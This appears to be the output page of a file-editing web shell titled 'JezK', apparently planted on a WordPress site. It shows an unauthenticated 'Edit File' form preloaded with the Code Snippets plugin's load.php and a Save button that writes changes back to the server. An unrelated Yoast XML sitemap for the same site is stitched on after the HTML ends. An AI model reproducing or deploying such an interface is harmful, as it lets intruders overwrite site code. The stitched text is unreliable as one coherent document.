
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: load.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Initialise and load the plugin under the proper namespace.
 *
 * @package Code_Snippets
 */

namespace Code_Snippets;

/**
 * The version number for this release of the plugin.
 * This will later be used for upgrades and enqueuing files.
 *
 * This should be set to the &#039;Plugin Version&#039; value defined
 * in the plugin header.
 *
 * @var string A PHP-standardized version number string.
 */
const PLUGIN_VERSION = CODE_SNIPPETS_VERSION;

/**
 * The full path to the main file of this plugin.
 *
 * This can later be used with functions such as
 * plugin_dir_path(), plugins_url() and plugin_basename()
 * to retrieve information about plugin paths.
 *
 * @var string
 */
const PLUGIN_FILE = CODE_SNIPPETS_FILE;

/**
 * Name of the group used for caching data.
 *
 * @var string
 */
const CACHE_GROUP = &#039;code_snippets&#039;;

/**
 * Namespace used for REST API endpoints.
 *
 * @var string
 */
const REST_API_NAMESPACE = &#039;code-snippets/v&#039;;

// Load dependencies with Composer.
$code_snippets_autoloader = require dirname( __DIR__ ) . &#039;/vendor/autoload.php&#039;;

// Remove all original (non-prefixed) vendor namespace mappings to prevent collisions with other plugins.
// Since Imposter rewrites namespaces to Code_Snippets\Vendor\*, we need to remove the original PSR-4
// mappings that Composer generates so other plugins can load their own copies of these libraries.
if ( $code_snippets_autoloader instanceof \Composer\Autoload\ClassLoader ) {
	$prefixes = $code_snippets_autoloader-&gt;getPrefixesPsr4();
	$our_prefix = &#039;Code_Snippets\\Vendor\\&#039;;
	
	foreach ( $prefixes as $namespace =&gt; $paths ) {
		// Remove any non-Code_Snippets namespace that has a corresponding prefixed version
		if ( strpos( $namespace, $our_prefix ) === false ) {
			$prefixed_namespace = $our_prefix . $namespace;
			if ( isset( $prefixes[ $prefixed_namespace ] ) ) {
				$code_snippets_autoloader-&gt;setPsr4( $namespace, [] );
			}
		}
	}
}

/**
 * Retrieve the instance of the main plugin class.
 *
 * @return Plugin
 * @since 2.6.0
 */
function code_snippets(): Plugin {
	static $plugin;

	if ( is_null( $plugin ) ) {
		$plugin = new Plugin( PLUGIN_VERSION, PLUGIN_FILE );
	}

	return $plugin;
}

code_snippets()-&gt;load_plugin();
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//drjoaopaulocostabraga.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://drjoaopaulocostabraga.com/post-sitemap.xml</loc>
		<lastmod>2026-09-25T12:20:57+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://drjoaopaulocostabraga.com/page-sitemap.xml</loc>
		<lastmod>2026-09-03T19:14:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://drjoaopaulocostabraga.com/category-sitemap.xml</loc>
		<lastmod>2026-09-25T12:20:57+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://drjoaopaulocostabraga.com/author-sitemap.xml</loc>
		<lastmod>2024-04-04T21:04:44+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->